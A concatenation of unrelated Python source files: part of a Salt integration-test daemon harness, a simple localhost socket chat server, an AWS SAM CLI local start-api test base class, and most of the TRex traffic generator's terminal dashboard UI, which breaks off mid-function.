minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
self.master_process.terminate()
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
#salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
#self.sub_minion_process.join()
#salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
#self.minion_process.join()
#salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
#self.master_process.join()
#try:
# salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
# self.syndic_process.join()
#except AttributeError:
# pass
#try:
# salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
# self.smaster_process.join()
#except AttributeError:
# pass
self.log_server.server_close()
self.log_server.shutdown()
self._exit_mockbin()
self._exit_ssh()
self.log_server_process.join()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
shutil.rmtree(dirname, onerror=remove_readonly)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', tgt_type='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
salt.utils.appendproctitle('WaitForMinionConnections')
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
try:
responses = self.client.cmd(
list(expected_connections), 'test.ping', tgt_type='list',
)
# we'll get this exception if the master process hasn't finished starting yet
except SaltClientError:
time.sleep(0.1)
now = datetime.now()
continue
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns',
PNUM)
)
)
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
print(
'\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
tgt_type='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
# An errors has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.appendproctitle('SyncMinionGrains')
self.sync_minion_modules_('grains', targets, timeout=timeout)
|
server.py | import socket
import threading
import time
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 65339 # Port to listen on (non-privileged ports are > 1023)
def client(conn,addr,startchat):
with conn:
print('Connected by', addr)
i=0
while i < len(startchat)-1:
conn.sendall(bytes(startchat[i],'utf-8'))
i+=1
conn.sendall(bytes("9849846516189615",'utf-8'))
while True:
data = conn.recv(1024)
if not data:
i = 0
while i < len(clients):
if clients[i] == conn:
print("remove")
clients[i].remove()
break
i+=1
break
d = repr(addr)+":"+repr(data)
post(d)
chat = []
clients = []
def stamp():
t = time.localtime()
return str(t.tm_hour) +":"+ str(t.tm_min) +":"
def post(msg):
msg = stamp()+msg
chat.append(msg+"\n")
for cl in clients:
try:
cl[0].sendall(bytes(msg,'utf-8'))
except:
pass
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
try:
s.listen()
while True:
conn, addr = s.accept()
while True:
name = conn.recv(1024)
name = repr(name)
print(name)
if "9849846516189615" in name:
name = name[1:-17]
break
login = name+" joined"
post(login)
clients.append((conn,addr))
print('Connected by', addr)
mythread = threading.Thread(target=client, args = (conn,name,chat),name = "Thread-{}".format(addr),) # ...Instantiate a thread and pass a unique ID to it
mythread.start()
except (KeyboardInterrupt, SystemExit):
s.close()
|
start_api_integ_base.py | import shutil
import uuid
from typing import List, Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen, PIPE
import os
import logging
import random
from pathlib import Path
import docker
from docker.errors import APIError
from tests.testing_utils import kill_process
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
LOG = logging.getLogger(__name__)
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
template: Optional[str] = None
container_mode: Optional[str] = None
parameter_overrides: Optional[Dict[str, str]] = None
binary_data_file: Optional[str] = None
integration_dir = str(Path(__file__).resolve().parents[2])
invoke_image: Optional[List] = None
layer_cache_base_dir: Optional[str] = None
build_before_invoke = False
build_overrides: Optional[Dict[str, str]] = None
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to file the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
if cls.build_before_invoke:
cls.build()
cls.port = str(StartApiIntegBaseClass.random_port())
cls.docker_client = docker.from_env()
for container in cls.docker_client.api.containers():
try:
cls.docker_client.api.remove_container(container, force=True)
except APIError as ex:
LOG.error("Failed to remove container %s", container, exc_info=ex)
cls.start_api()
@classmethod
def build(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "build"]
if cls.build_overrides:
overrides_arg = " ".join(
["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
)
command_list += ["--parameter-overrides", overrides_arg]
working_dir = str(Path(cls.template).resolve().parents[0])
run_command(command_list, cwd=working_dir)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
if cls.container_mode:
command_list += ["--warm-containers", cls.container_mode]
if cls.parameter_overrides:
command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
if cls.layer_cache_base_dir:
command_list += ["--layer-cache-basedir", cls.layer_cache_base_dir]
if cls.invoke_image:
for image in cls.invoke_image:
command_list += ["--invoke-image", image]
cls.start_api_process = Popen(command_list, stderr=PIPE)
while True:
line = cls.start_api_process.stderr.readline()
line_as_str = str(line.decode("utf-8")).strip()
if line_as_str:
LOG.info(f"{line_as_str}")
if "(Press CTRL+C to quit)" in line_as_str:
break
cls.stop_reading_thread = False
def read_sub_process_stderr():
while not cls.stop_reading_thread:
cls.start_api_process.stderr.readline()
cls.read_threading = threading.Thread(target=read_sub_process_stderr, daemon=True)
cls.read_threading.start()
@classmethod
def _make_parameter_override_arg(self, overrides):
return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.stop_reading_thread = True
kill_process(cls.start_api_process)
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
temp_path: Optional[str] = None
template_path: Optional[str] = None
code_path: Optional[str] = None
docker_file_path: Optional[str] = None
@classmethod
def setUpClass(cls):
cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir, ignore_errors=True)
os.mkdir(working_dir)
os.mkdir(Path(cls.integration_dir).resolve().joinpath(cls.temp_path).joinpath("dir"))
cls.template_path = f"/{cls.temp_path}/template.yaml"
cls.code_path = f"/{cls.temp_path}/main.py"
cls.code_path2 = f"/{cls.temp_path}/dir/main2.py"
cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
cls.docker_file_path2 = f"/{cls.temp_path}/Dockerfile2"
if cls.template_content:
cls._write_file_content(cls.template_path, cls.template_content)
if cls.code_content:
cls._write_file_content(cls.code_path, cls.code_content)
if cls.docker_file_content:
cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
super().setUpClass()
@classmethod
def _write_file_content(cls, path, content):
with open(cls.integration_dir + path, "w") as f:
f.write(content)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir, ignore_errors=True)
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
pass
def ascii_split (s):
output = []
lines = s.split('\n')
for elem in lines:
if ansi_len(elem) > 0:
output.append(elem)
return output
class SimpleBar(object):
def __init__ (self, desc, pattern):
self.desc = desc
self.pattern = pattern
self.pattern_len = len(pattern)
self.index = 0
def show (self, buffer):
if self.desc:
print(format_text("{0} {1}".format(self.desc, self.pattern[self.index]), 'bold'), file = buffer)
else:
print(format_text("{0}".format(self.pattern[self.index]), 'bold'), file = buffer)
self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
def __init__ (self, mng, name):
self.mng = mng
self.name = name
self.client = mng.client
self.is_graph = False
def show (self, buffer):
raise NotImplementedError("must implement this")
def get_key_actions (self):
raise NotImplementedError("must implement this")
def get_name (self):
return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
self.ports = self.client.get_all_ports()
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
# register all the ports to the toggle action
for port_id in self.ports:
self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
self.toggle_filter = ToggleFilter(self.ports)
if self.client.get_acquired_ports():
self.action_show_owned()
else:
self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_streams_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUILatencyStats, self).__init__(mng, "lstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
self.is_histogram = False
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.is_histogram:
self.client._show_latency_histogram(buffer = buffer)
else:
self.client._show_latency_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_histogram (self):
self.is_histogram = not self.is_histogram
return ""
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
def __init__(self, mng):
super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
self.start_row = 0
self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
self.num_lines = 0
self.tgid = 0
self.is_sum = True if self.client.is_dynamic else False
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
buf = StringIO()
have_into = False
try:
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid, is_sum = self.is_sum)
have_into = True
except ASTFErrorBadTG:
self.tgid = 0
if have_into:
buf.seek(0)
out_lines = buf.readlines()
self.num_lines = len(out_lines)
buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
buffer.write('\n')
def get_key_actions(self):
return self.key_actions
def action_clear(self):
self.client.clear_traffic_stats()
return ""
def action_up(self):
if self.start_row > self.num_lines:
self.start_row = self.num_lines
elif self.start_row > 0:
self.start_row -= 1
def action_down(self):
if self.start_row < self.num_lines - self.max_lines:
self.start_row += 1
def action_left(self):
if self.tgid > 0:
self.tgid -= 1
def action_right(self):
if self.tgid < self.client._get_num_of_tgids():
self.tgid += 1
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
self.key_actions = OrderedDict()
self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
self.views = [
{'name': 'main latency', 'func': self.client._show_latency_stats},
{'name': 'histogram', 'func': self.client._show_latency_histogram},
{'name': 'counters', 'func': self.client._show_latency_counters},
]
self.view_index = 0
self.next_view_index = 1
def get_next_view(self):
return "view toggle to '%s'" % self.views[self.next_view_index]['name']
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
self.views[self.view_index]['func'](buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_view(self):
self.view_index = self.next_view_index
self.next_view_index = (1 + self.next_view_index) % len(self.views)
return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
self.key_actions = {}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_cpu_util(buffer = buffer)
self.client._show_mbuf_util(buffer = buffer)
def get_key_actions (self):
return self.key_actions
# log
class TrexTUILog():
def __init__ (self):
self.log = []
def add_event (self, msg):
self.log.append("[{0}] {1}".format(str(datetime.datetime.now().time()), msg))
def show (self, buffer, max_lines = 4):
cut = len(self.log) - max_lines
if cut < 0:
cut = 0
print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
for msg in self.log[cut:]:
print(msg, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
def __init__ (self, func):
self.func = func
def __nonzero__ (self):
return True if self.func() else False
def __bool__ (self):
return True if self.func() else False
# Panels manager (contains server panels)
class TrexTUIPanelManager():
def __init__ (self, tui):
self.tui = tui
self.client = tui.client
self.ports = self.client.get_all_ports()
self.locked = False
self.panels = {}
self.panels['dashboard'] = TrexTUIDashBoard(self)
self.panels['ustats'] = TrexTUIUtilizationStats(self)
self.key_actions = OrderedDict()
# we allow console only when ports are acquired
self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
# HACK - FIX THIS
# stateless specific panels
if self.client.get_mode() == "STL":
self.panels['sstats'] = TrexTUIStreamsStats(self)
self.panels['lstats'] = TrexTUILatencyStats(self)
self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
elif self.client.get_mode() == "ASTF":
self.panels['astats'] = TrexTUIAstfTrafficStats(self)
self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
# start with dashboard
self.main_panel = self.panels['dashboard']
# log object
self.log = TrexTUILog()
self.generate_legend()
self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
self.dis_bar = SimpleBar('status: ', ['X', ' '])
self.show_log = False
def generate_legend(self):
self.legend = "\n{:<12}".format("browse:")
for k, v in self.key_actions.items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
for k, v in self.main_panel.get_key_actions().items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
def print_connection_status (self, buffer):
if self.tui.get_state() == self.tui.STATE_ACTIVE:
self.conn_bar.show(buffer = buffer)
else:
self.dis_bar.show(buffer = buffer)
def print_legend (self, buffer):
print(format_text(self.legend, 'bold'), file = buffer)
# on window switch or turn on / off of the TUI we call this
def init (self, show_log = False, locked = False):
self.show_log = show_log
self.locked = locked
self.generate_legend()
def show (self, show_legend, buffer):
try:
self.main_panel.show(buffer)
except:
if self.client.is_connected():
raise
self.print_connection_status(buffer)
if show_legend:
self.generate_legend()
self.print_legend(buffer)
if self.show_log:
self.log.show(buffer)
def handle_key (self, ch):
# check for the manager registered actions
if ch in self.key_actions:
msg = self.key_actions[ch]['action']()
# check for main panel actions
elif ch in self.main_panel.get_key_actions():
msg = self.main_panel.get_key_actions()[ch]['action']()
else:
return False
self.generate_legend()
return True
#if msg == None:
# return False
#else:
# if msg:
# self.log.add_event(msg)
# return True
# actions
def action_none (self):
return None
def action_show_dash (self):
self.main_panel = self.panels['dashboard']
self.init(self.show_log)
return ""
def action_show_port (self, port_id):
def action_show_port_x ():
self.main_panel = self.panels['port {0}'.format(port_id)]
self.init()
return ""
return action_show_port_x
def action_show_sstats (self):
self.main_panel = self.panels['sstats']
self.init(self.show_log)
return ""
def action_show_astats (self):
self.main_panel = self.panels['astats']
self.init(self.show_log)
return ""
def action_show_lstats (self):
self.main_panel = self.panels['lstats']
self.init(self.show_log)
return ""
def action_show_ustats(self):
self.main_panel = self.panels['ustats']
self.init(self.show_log)
return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
def __init__ (self, redraw_cb):
self.snapshot = ''
self.lock = threading.Lock()
self.redraw_cb = redraw_cb
self.update_flag = False
def start (self):
self.active = True
self.t = threading.Thread(target = self.__handler)
self.t.setDaemon(True)
self.t.start()
def stop (self):
self.active = False
self.t.join()
# request an update
def update (self):
self.update_flag = True
# fetch the screen, return None if no new screen exists yet
def get (self):
if not self.snapshot:
return None
# we have a snapshot - fetch it
with self.lock:
x = self.snapshot
self.snapshot = None
return x
def __handler (self):
while self.active:
if self.update_flag:
self.__redraw()
time.sleep(0.01)
# redraw the next screen
def __redraw (self):
buffer = StringIO()
self.redraw_cb(buffer)
with self.lock:
self.snapshot = buffer
self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
def __init__ (self, rate):
self.ts = 0
self.marked = False
self.rate = rate
self.force = False
def mark_for_redraw (self, force = False):
self.marked = True
if force:
self.force = True
def should_redraw (self):
dt = time.time() - self.ts
return self.force or (self.marked and (dt > self.rate))
def reset (self, restart = False):
self.ts = time.time()
self.marked = restart
self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
self.time_ts = None
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
# regular state
if self.state == self.STATE_ACTIVE:
# if no connectivity - move to lost connecitivty
if not self.client.is_connected():
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# lost connectivity
elif self.state == self.STATE_LOST_CONT:
# if the connection is alive (some data is arriving on the async channel)
# try to reconnect
if (time.time() - self.time_ts) > 5.0:
# move to state reconnect
self.state = self.STATE_RECONNECT
# restored connectivity - try to reconnect
elif self.state == self.STATE_RECONNECT:
try:
self.client.connect()
self.client.acquire()
self.state = self.STATE_ACTIVE
except TRexError:
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# logic before printing
def prepare (self, status):
if status == AsyncKeys.STATUS_REDRAW_ALL:
self.full_redraw.mark_for_redraw(force = True)
elif status == AsyncKeys.STATUS_REDRAW_KEYS:
self.keys_redraw.mark_for_redraw()
if self.full_redraw.should_redraw():
self.sb.update()
self.full_redraw.reset(restart = True)
return
# draw once
def draw_screen (self):
